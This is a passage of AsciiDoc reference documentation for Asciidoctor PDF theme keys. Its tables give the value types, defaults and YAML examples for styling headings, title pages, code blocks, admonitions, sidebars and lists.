|Value Type |Example\n\n3+|[#key-prefix-literal]*Key Prefix:* <<key-prefix-literal,literal>>\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|literal:\n font_color: #b12146\n\n|font_family\n|<<fonts,Font family name>> +\n(default: Courier)\n|literal:\n font_family: M+ 1mn\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|literal:\n font_size: 12\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|literal:\n font_style: bold\n|===\n\n[#keys-heading]\n=== Heading\n\nThe keys in this category control the style of most headings, including part titles, chapter titles, sections titles, the table of contents title and discrete headings.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-heading]*Key Prefix:* <<key-prefix-heading,heading>>\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: $base_align)\n|heading:\n align: center\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|heading:\n font_color: #222222\n\n|font_family\n|<<fonts,Font family name>> +\n(default: $base_font_family)\n|heading:\n font_family: Noto Serif\n\n\/\/ NOTE: heading_font_size is overridden by h<n>_font_size in base theme\n\/\/|font_size\n\/\/|<<values,Number>> +\n\/\/(default: $base_font_size)\n\/\/|heading:\n\/\/ font_size: 18\n\n|font_style\n|<<font-styles,Font style>> +\n(default: bold)\n|heading:\n font_style: bold\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|heading:\n text_transform: uppercase\n\n|line_height\n|<<values,Number>> +\n(default: 1.15)\n|heading:\n line_height: 1.2\n\n|margin_top\n|<<measurement-units,Measurement>> +\n(default: 4)\n|heading:\n margin_top: $vertical_spacing * 0.2\n\n|margin_bottom\n|<<measurement-units,Measurement>> +\n(default: 12)\n|heading:\n margin_bottom: 9.6\n\n3+|[#key-prefix-heading-level]*Key Prefix:* <<key-prefix-heading-level,heading_h<n> >>^[1]^\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: $heading_align)\n|heading:\n h2_align: center\n\n|font_color\n|<<colors,Color>> +\n(default: $heading_font_color)\n|heading:\n h2_font_color: [0, 99%, 100%, 0]\n\n|font_family\n|<<fonts,Font family name>> +\n(default: $heading_font_family)\n|heading:\n h4_font_family: Roboto\n\n|font_size^[1]^\n|<<values,Number>> +\n(default: <1>=24; <2>=18; <3>=16; <4>=14; <5>=12; <6>=10)\n|heading:\n h6_font_size: $base_font_size * 1.7\n\n|font_style\n|<<font-styles,Font style>> +\n(default: $heading_font_style)\n|heading:\n h3_font_style: bold_italic\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: $heading_text_transform)\n|heading:\n text_transform: lowercase\n|===\n\n. `<n>` is a number ranging from 1 to 6, representing each of the six heading levels.\n. A font size is assigned to each heading level by the base theme.\nIf you want the font size of a specific level to be inherited, you must assign the value `null` (or `~` for short).\n\n[#keys-title-page]\n=== Title Page\n\nThe keys in this category control the style of the title page as well as the arrangement and style of the elements on it.\n\nTIP: The title page can be disabled from the document by setting the `notitle` attribute in the AsciiDoc document header.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-title-page]*Key Prefix:* <<key-prefix-title-page,title_page>>\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: center)\n|title_page:\n align: right\n\n|background_color^[1]^\n|<<colors,Color>> +\n(default: _inherit_)\n|title_page:\n background_color: #eaeaea\n\n|background_image^[1]^\n|Inline image macro^[2]^ +\n(default: _not set_)\n|title_page:\n background_image: image:title.png[]\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|title_page:\n font_color: #333333\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|title_page:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|title_page:\n font_size: 13\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|title_page:\n font_style: bold\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|title_page:\n text_transform: uppercase\n\n|line_height\n|<<values,Number>> +\n(default: 1.15)\n|title_page:\n line_height: 1\n\n3+|[#key-prefix-title-page-logo]*Key Prefix:* <<key-prefix-title-page-logo,title_page_logo>>\n\n|align\n|<<image-alignments,Image alignment>> +\n(default: _inherit_)\n|title_page:\n logo:\n align: right\n\n|image\n|Inline image macro^[2]^ +\n(default: _not set_)\n|title_page:\n logo:\n image: image:logo.png[pdfwidth=25%]\n\n|top\n|Percentage^[3]^ +\n(default: 10%)\n|title_page:\n logo:\n top: 25%\n\n3+|[#key-prefix-title-page-title]*Key Prefix:* <<key-prefix-title-page-title,title_page_title>>\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|title_page:\n title:\n font_color: #999999\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|title_page:\n title:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: 18)\n|title_page:\n title:\n font_size: $heading_h1_font_size\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|title_page:\n title:\n font_style: bold\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|title_page:\n title:\n text_transform: uppercase\n\n|line_height\n|<<values,Number>> +\n(default: $heading_line_height)\n|title_page:\n title:\n line_height: 0.9\n\n|top\n|Percentage^[3]^ +\n(default: 40%)\n|title_page:\n title:\n top: 55%\n\n|margin_top\n|<<measurement-units,Measurement>> +\n(default: 0)\n|title_page:\n title:\n margin_top: 13.125\n\n|margin_bottom\n|<<measurement-units,Measurement>> +\n(default: 0)\n|title_page:\n title:\n margin_bottom: 5\n\n3+|[#key-prefix-title-page-subtitle]*Key Prefix:* <<key-prefix-title-page-subtitle,title_page_subtitle>>\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|title_page:\n subtitle:\n font_color: #181818\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|title_page:\n subtitle:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: 14)\n|title_page:\n subtitle:\n font_size: $heading_h3_font_size\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|title_page:\n subtitle:\n font_style: bold_italic\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|title_page:\n subtitle:\n text_transform: uppercase\n\n|line_height\n|<<values,Number>> +\n(default: $heading_line_height)\n|title_page:\n subtitle:\n line_height: 1\n\n|margin_top\n|<<measurement-units,Measurement>> +\n(default: 0)\n|title_page:\n subtitle:\n margin_top: 13.125\n\n|margin_bottom\n|<<measurement-units,Measurement>> +\n(default: 0)\n|title_page:\n subtitle:\n margin_bottom: 5\n\n3+|[#key-prefix-authors]*Key Prefix:* <<key-prefix-authors,title_page_authors>>\n\n|delimiter\n|<<quoted-string,Quoted string>> +\n(default: ', ')\n|title_page:\n authors:\n delimiter: '; '\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|title_page:\n authors:\n font_color: #181818\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|title_page:\n authors:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|title_page:\n authors:\n font_size: 13\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|title_page:\n authors:\n font_style: bold_italic\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|title_page:\n authors:\n text_transform: uppercase\n\n|margin_top\n|<<measurement-units,Measurement>> +\n(default: 12)\n|title_page:\n authors:\n margin_top: 13.125\n\n|margin_bottom\n|<<measurement-units,Measurement>> +\n(default: 0)\n|title_page:\n authors:\n margin_bottom: 5\n\n3+|[#key-prefix-revision]*Key Prefix:* <<key-prefix-revision,title_page_revision>>\n\n|delimiter\n|<<quoted-string,Quoted string>> +\n(default: ', ')\n|title_page:\n revision:\n delimiter: ': '\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|title_page:\n revision:\n font_color: #181818\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|title_page:\n revision:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|title_page:\n revision:\n font_size: $base_font_size_small\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|title_page:\n revision:\n font_style: bold\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|title_page:\n revision:\n text_transform: uppercase\n\n|margin_top\n|<<measurement-units,Measurement>> +\n(default: 0)\n|title_page:\n revision:\n margin_top: 13.125\n\n|margin_bottom\n|<<measurement-units,Measurement>> +\n(default: 0)\n|title_page:\n revision:\n margin_bottom: 5\n|===\n\n. Page background images are automatically scaled to fit within the bounds of the page.\n+\nNOTE: Page backgrounds do not currently work when using AsciidoctorJ PDF.\nThis limitation is due to a bug in Prawn 1.3.1.\nThe limitation will remain until AsciidoctorJ PDF upgrades to Prawn 2.x (an upgrade that is waiting on AsciidoctorJ to migrate to JRuby 9000).\nFor more details, see http:\/\/discuss.asciidoctor.org\/Asciidoctor-YAML-style-file-for-PDF-and-maven-td3849.html[this thread].\n. Target may be an absolute path or a path relative to the value of the `pdf-stylesdir` attribute.\n. Percentage unit can be % (relative to content height) or vh (relative to page height).\n\n[#keys-prose]\n=== Prose\n\nThe keys in this category control the spacing around paragraphs (paragraph blocks, paragraph content of a block, and other prose content).\nTypically, all the margin is placed on the bottom.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-prose]*Key Prefix:* <<key-prefix-prose,prose>>\n\n|margin_top\n|<<measurement-units,Measurement>> +\n(default: 0)\n|prose:\n margin_top: 0\n\n|margin_bottom\n|<<measurement-units,Measurement>> +\n(default: 12)\n|prose:\n margin_bottom: $vertical_spacing\n|===\n\n[#keys-block]\n=== Block\n\nThe keys in this category control the spacing around block elements when a more specific setting is not designated.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-block]*Key Prefix:* <<key-prefix-block,block>>\n\n\/\/|padding\n\/\/|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>>\n\/\/|block:\n\/\/ padding: [12, 15, 12, 15]\n\n|margin_top\n|<<measurement-units,Measurement>> +\n(default: 0)\n|block:\n margin_top: 6\n\n|margin_bottom\n|<<measurement-units,Measurement>> +\n(default: 12)\n|block:\n margin_bottom: 6\n|===\n\nBlock styles are applied to the following block types:\n\n[cols=\"3*a\",grid=none,frame=none]\n|===\n|\n* admonition\n* example\n* quote\n|\n* verse\n* sidebar\n* image\n|\n* listing\n* literal\n* table\n|===\n\n[#keys-caption]\n=== Caption\n\nThe keys in this category control the arrangement and style of block captions.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-caption]*Key Prefix:* <<key-prefix-caption,caption>>\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: left)\n|caption:\n align: left\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|caption:\n font_color: #333333\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|caption:\n font_family: M+ 1mn\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|caption:\n font_size: 11\n\n|font_style\n|<<font-styles,Font style>> +\n(default: italic)\n|caption:\n font_style: italic\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|caption:\n text_transform: uppercase\n\n|margin_inside\n|<<measurement-units,Measurement>> +\n(default: 4)\n|caption:\n margin_inside: 3\n\n|margin_outside\n|<<measurement-units,Measurement>> +\n(default: 0)\n|caption:\n margin_outside: 0\n|===\n\n[#keys-code]\n=== Code\n\nThe keys in this category are used to control the style of literal, listing and source blocks.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-code]*Key Prefix:* <<key-prefix-code,code>>\n\n|background_color\n|<<colors,Color>> +\n(default: _not set_)\n|code:\n background_color: #f5f5f5\n\n|border_color\n|<<colors,Color>> +\n(default: #eeeeee)\n|code:\n border_color: #cccccc\n\n|border_radius\n|<<values,Number>> +\n(default: _not set_)\n|code:\n border_radius: 4\n\n|border_width\n|<<values,Number>> +\n(default: 0.5)\n|code:\n border_width: 0.75\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|code:\n font_color: #333333\n\n|font_family\n|<<fonts,Font family name>> +\n(default: Courier)\n|code:\n font_family: M+ 1mn\n\n|font_size\n|<<values,Number>> +\n(default: 10.5)\n|code:\n font_size: 11\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|code:\n font_style: italic\n\n|line_height\n|<<values,Number>> +\n(default: 1.2)\n|code:\n line_height: 1.25\n\n|line_gap^[1]^\n|<<values,Number>> +\n(default: 0)\n|code:\n line_gap: 3.8\n\n|padding\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: 9)\n|code:\n padding: 11\n\n3+|[#key-prefix-table-cell]*Key Prefix:* <<key-prefix-code-linenum,code_linenum>>^[2]^\n\n|font_color\n|<<colors,Color>> +\n(default: #999999)\n|code:\n linenum_font_color: #ccc\n|===\n. The line_gap is used to tune the height of the background color applied to a span of block text highlighted using Rouge.\n. The code_linenum category only applies when using Pygments as the source highlighter.\nOtherwise, the style is controlled by the source highlighter theme.\n\n[#keys-callout-numbers]\n=== Callout Numbers\n\nThe keys in this category are used to control the style of callout numbers (conums) inside verbatim blocks and in callout lists (colists).\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-conum]*Key Prefix:* <<key-prefix-conum,conum>>\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|conum:\n font_color: #b12146\n\n|font_family^[1,2]^\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|conum:\n font_family: M+ 1mn\n\n|font_size^[2]^\n|<<values,Number>> +\n(default: _inherit_)\n|conum:\n font_size: $base_font_size\n\n|font_style^[2]^\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|conum:\n font_style: normal\n\n|line_height^[2]^\n|<<values,Number>> +\n(default: 1.15)\n|conum:\n line_height: 4 \/ 3\n|===\n\n. Currently, the font must contain the circle numbers starting at glyph U+2460.\n. font_family, font_size, font_style, and line_height are only used for markers in a colist.\nThese properties are inherited for conums inside a verbatim block.\n\n[#keys-menu]\n=== Menu\n\nThe keys in this category apply to the menu label (generated from the inline menu macro).\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-menu]*Key Prefix:* <<key-prefix-menu,menu>>\n\n|caret_content\n|<<quoted-string,Quoted string>> +\n(default: \" \\u203a \")\n|menu:\n caret_content: ' > '\n|===\n\n[#keys-blockquote]\n=== Blockquote\n\nThe keys in this category control the arrangement and style of quote blocks.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-blockquote]*Key Prefix:* <<key-prefix-blockquote,blockquote>>\n\n|border_width^[1]^\n|<<values,Number>> +\n(default: 4)\n|blockquote:\n border_width: 5\n\n|border_color^[1]^\n|<<colors,Color>> +\n(default: #eeeeee)\n|blockquote:\n border_color: #eeeeee\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|blockquote:\n font_color: #333333\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|blockquote:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|blockquote:\n font_size: 13\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|blockquote:\n font_style: bold\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|blockquote:\n text_transform: uppercase\n\n|padding\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: [6, 12, -6, 14])\n|blockquote:\n padding: [5, 10, -5, 12]\n\n3+|[#key-prefix-blockquote-cite]*Key Prefix:* <<key-prefix-blockquote-cite,blockquote_cite>>\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|blockquote:\n cite:\n font_size: 9\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|blockquote:\n cite:\n font_color: #999999\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|blockquote:\n cite:\n font_family: Noto Serif\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|blockquote:\n cite:\n font_style: bold\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|blockquote:\n cite:\n text_transform: uppercase\n|===\n\n. Only applies to the left side.\n\n[#keys-sidebar]\n=== Sidebar\n\nThe keys in this category control the arrangement and style of sidebar blocks.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-sidebar]*Key Prefix:* <<key-prefix-sidebar,sidebar>>\n\n|background_color\n|<<colors,Color>> +\n(default: #eeeeee)\n|sidebar:\n background_color: #eeeeee\n\n|border_color\n|<<colors,Color>> +\n(default: _not set_)\n|sidebar:\n border_color: #ffffff\n\n|border_radius\n|<<values,Number>> +\n(default: _not set_)\n|sidebar:\n border_radius: 4\n\n|border_width\n|<<values,Number>> +\n(default: _not set_)\n|sidebar:\n border_width: 0.5\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|sidebar:\n font_color: #262626\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|sidebar:\n font_family: M+ 1p\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|sidebar:\n font_size: 13\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|sidebar:\n font_style: italic\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|sidebar:\n text_transform: uppercase\n\n|padding\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: [12, 12, 0, 12])\n|sidebar:\n padding: [12, 15, 0, 15]\n\n3+|[#key-prefix-sidebar-title]*Key Prefix:* <<key-prefix-sidebar-title,sidebar_title>>\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: center)\n|sidebar:\n title:\n align: center\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|sidebar:\n title:\n font_color: #333333\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|sidebar:\n title:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|sidebar:\n title:\n font_size: 13\n\n|font_style\n|<<font-styles,Font style>> +\n(default: bold)\n|sidebar:\n title:\n font_style: bold\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|sidebar:\n title:\n text_transform: uppercase\n|===\n\n[#keys-example]\n=== Example\n\nThe keys in this category control the arrangement and style of example blocks.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-example]*Key Prefix:* <<key-prefix-example,example>>\n\n|background_color\n|<<colors,Color>> +\n(default: #ffffff)\n|example:\n background_color: #fffef7\n\n|border_color\n|<<colors,Color>> +\n(default: #eeeeee)\n|example:\n border_color: #eeeeee\n\n|border_radius\n|<<values,Number>> +\n(default: _not set_)\n|example:\n border_radius: 4\n\n|border_width\n|<<values,Number>> +\n(default: 0.5)\n|example:\n border_width: 0.75\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|example:\n font_color: #262626\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|example:\n font_family: M+ 1p\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|example:\n font_size: 13\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|example:\n font_style: italic\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|example:\n text_transform: uppercase\n\n|padding\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: [12, 12, 0, 12])\n|example:\n padding: [15, 15, 0, 15]\n|===\n\n[#keys-admonition]\n=== Admonition\n\nThe keys in this category control the arrangement and style of admonition blocks and the icon used for each admonition type.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-admonition]*Key Prefix:* <<key-prefix-admonition,admonition>>\n\n|column_rule_color\n|<<colors,Color>> +\n(default: #eeeeee)\n|admonition:\n column_rule_color: #aa0000\n\n|column_rule_style\n|solid {vbar} double {vbar} dashed {vbar} dotted +\n(default: solid)\n|admonition:\n column_rule_style: double\n\n|column_rule_width\n|<<values,Number>> +\n(default: 0.5)\n|admonition:\n column_rule_width: 0.5\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|admonition:\n font_color: #999999\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|admonition:\n font_family: Noto Sans\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|admonition:\n font_size: $base_font_size_large\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|admonition:\n font_style: italic\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|admonition:\n text_transform: none\n\n|padding\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: [0, 12, 0, 12])\n|admonition:\n padding: [0, 12, 0, 12]\n\n3+|[#key-prefix-admonition-label]*Key Prefix:* <<key-prefix-admonition-label,admonition_label>>\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: center)\n|admonition:\n label:\n align: center\n\n|min_width\n|<<measurement-units,Measurement>> +\n(default: _not set_)\n|admonition:\n label:\n min_width: 48\n\n|padding^[1]^\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: $admonition_padding)\n|admonition:\n padding: [0, 12, 0, 12]\n\n|vertical_align\n|top {vbar} middle {vbar} bottom +\n(default: middle)\n|admonition:\n label:\n vertical_align: top\n\n3+|*Key Prefix:* admonition_label, admonition_label_<name>^[2]^\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|admonition:\n label:\n font_color: #262626\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|admonition:\n label:\n font_family: M+ 1p\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|admonition:\n label:\n font_size: 12\n\n|font_style\n|<<font-styles,Font style>> +\n(default: bold)\n|admonition:\n label:\n font_style: bold_italic\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: uppercase)\n|admonition:\n label:\n text_transform: lowercase\n\n3+|[#key-prefix-admonition-icon]*Key Prefix:* <<key-prefix-admonition-icon,admonition_icon_<name> >>^[2]^\n\n|name\n|<icon set>-<icon name>^[3]^ +\n(default: _not set_)\n|admonition:\n icon:\n tip:\n name: fa-fire\n\n|stroke_color\n|<<colors,Color>> +\n(default: caution=#bf3400; important=#bf0000; note=#19407c; tip=#111111; warning=#bf6900)\n|admonition:\n icon:\n important:\n stroke_color: ff0000\n\n|size\n|<<values,Number>> +\n(default: 24)\n|admonition:\n icon:\n note:\n size: 24\n|===\n\n. The top and bottom padding values are ignored on admonition_label_padding.\n. `<name>` can be `note`, `tip`, `warning`, `important`, or `caution`.\nThe subkeys in the icon category cannot be flattened (e.g., `tip_name: fa-lightbulb-o` is not valid syntax).\n. Required.\nSee the `.yml` files in the https:\/\/github.com\/jessedoyle\/prawn-icon\/tree\/master\/data\/fonts[prawn-icon repository] for a list of valid icon names.\nThe prefix (e.g., `fa-`) determines which font set to use.\n\n[#keys-image]\n=== Image\n\nThe keys in this category control the arrangement of block images.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-image]*Key Prefix:* <<key-prefix-image,image>>\n\n|align\n|<<image-alignments,Image alignment>> +\n(default: left)\n|image:\n align: left\n\n|width^[1]^\n|<<measurement-units,Measurement>> +\n(default: _not set_)\n|image:\n width: 100%\n|===\n\n. Only applies to block images.\nIf specified, this value takes precedence over the value of the `width` attribute on the image macro, but not over the value of the `pdfwidth` attribute.\n\n[#keys-lead]\n=== Lead\n\nThe keys in this category control the styling of lead paragraphs.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-lead]*Key Prefix:* <<key-prefix-lead,lead>>\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|lead:\n font_color: #262626\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|lead:\n font_family: M+ 1p\n\n|font_size\n|<<values,Number>> +\n(default: 13.5)\n|lead:\n font_size: 13\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|lead:\n font_style: bold\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|lead:\n text_transform: uppercase\n\n|line_height\n|<<values,Number>> +\n(default: 1.4)\n|lead:\n line_height: 1.4\n|===\n\n[#keys-abstract]\n=== Abstract\n\nThe keys in this category control the arrangement and style of the abstract.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-abstract]*Key Prefix:* <<key-prefix-abstract,abstract>>\n\n|font_color\n|<<colors,Color>> +\n(default: $base_font_color)\n|abstract:\n font_color: #5c6266\n\n|font_size\n|<<values,Number>> +\n(default: 13.5)\n|abstract:\n font_size: 13\n\n|font_style\n|<<font-styles,Font style>> +\n(default: $base_font_style)\n|abstract:\n font_style: italic\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: $base_text_transform)\n|abstract:\n text_transform: uppercase\n\n|line_height\n|<<values,Number>> +\n(default: 1.4)\n|abstract:\n line_height: 1.4\n\n|padding\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: 0)\n|abstract:\n padding: [0, 12, 0, 12]\n\n3+|[#key-prefix-abstract-title]*Key Prefix:* <<key-prefix-abstract-title,abstract_title>>\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: center)\n|abstract:\n title:\n align: center\n\n|font_color\n|<<colors,Color>> +\n(default: $base_font_color)\n|abstract:\n title:\n font_color: #333333\n\n|font_family\n|<<fonts,Font family name>> +\n(default: $base_font_family)\n|abstract:\n title:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: $base_font_size)\n|abstract:\n title:\n font_size: 13\n\n|font_style\n|<<font-styles,Font style>> +\n(default: bold)\n|abstract:\n title:\n font_style: bold\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: $base_text_transform)\n|abstract:\n title:\n text_transform: uppercase\n|===\n\n[#keys-thematic-break]\n=== Thematic Break\n\nThe keys in this category control the style of thematic breaks (aka horizontal rules).\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-thematic-break]*Key Prefix:* <<key-prefix-thematic-break,thematic_break>>\n\n|border_color\n|<<colors,Color>> +\n(default: #eeeeee)\n|thematic_break:\n border_color: #eeeeee\n\n|border_style\n|solid {vbar} double {vbar} dashed {vbar} dotted +\n(default: solid)\n|thematic_break:\n border_style: dashed\n\n|border_width\n|<<measurement-units,Measurement>> +\n(default: 0.5)\n|thematic_break:\n border_width: 0.5\n\n|margin_top\n|<<measurement-units,Measurement>> +\n(default: 0)\n|thematic_break:\n margin_top: 6\n\n|margin_bottom\n|<<measurement-units,Measurement>> +\n(default: $vertical_spacing)\n|thematic_break:\n margin_bottom: 18\n|===\n\n[#keys-description-list]\n=== Description List\n\nThe keys in this category control the arrangement and style of definition list items (terms and descriptions).\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-description-list]*Key Prefix:* <<key-prefix-description-list,description_list>>\n\n|term_font_style\n|<<font-styles,Font style>> +\n(default: bold)\n|description_list:\n term_font_style: italic\n\n|term_spacing\n|<<measurement-units,Measurement>> +\n(default: 4)\n|description_list:\n term_spacing: 5\n\n|description_indent\n|<<values,Number>> +\n(default: 30)\n|description_list:\n description_indent: 15\n|===\n\n[#keys-outline-list]\n=== Outline List\n\nThe keys in this category control the arrangement and style of outline list items.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-outline-list]*Key Prefix:* <<key-prefix-outline-list,outline_list>>\n\n|indent\n|<<measurement-units,Measurement>> +\n(default: 30)\n|outline_list:\n indent: 40\n\n|item_spacing\n|<<measurement-units,Measurement>> +\n(default: 6)\n|outline_list:\n item_spacing: 4\n\n|marker_font_color^[1]^\n|<<colors,Color>> +\n(default: _inherit_)\n|outline_list:\n marker_font_color: #3c763d \n\n|text_align^[2]^\n|<<text-alignments,Text alignment>> +\n(default: $base_align)\n|outline_list:\n text_align: left\n|===\n\n. Controls the color of the bullet glyph that marks items in unordered lists and the number for items in ordered lists.\n. Controls the alignment of the list text only, not nested content (blocks or lists).\n\n[#keys-ulist]\n=== Unordered List\n\nThe keys in this category control the arrangement and style of unordered list items.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-ulist-marker]*Key Prefix:* <<key-prefix-ulist-marker,ulist_marker>>\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|ulist\n marker:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|ulist\n marker:\n font_size: 9\n\n|font_color\n|<<colors,Color>> +\n(default: $outline_list_marker_font_color)\n|ulist\n marker:\n font_color: #cccccc\n\n|line_height\n|<<values,Number>> +\n(default: $base_line_height)\n|ulist\n marker:\n line_height: 1.5\n|===\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type 